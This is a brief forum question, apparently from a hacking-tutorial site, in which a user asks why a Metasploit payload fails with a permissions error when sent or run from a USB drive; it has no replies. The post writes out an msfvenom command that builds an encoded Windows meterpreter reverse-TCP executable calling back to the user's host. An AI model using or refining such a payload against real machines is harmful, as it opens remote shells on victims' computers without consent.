Forum Thread: Metasploit Framewerk Payload Permissions

When I create a payload with encoding:
msfvenom -p windows/meterpreter/reversetcp LHOST=inet adress LPORT=443 -e cmd/powershellbase64 -f exe -o template.exe

When it's being sent or put on a USB Drive and attempted to be executed it doesn't work and just tells me that I may not have enough permission.

Can anyone help? Thank you.

Be the First to Respond

Share Your Thoughts

  • Hot
  • Active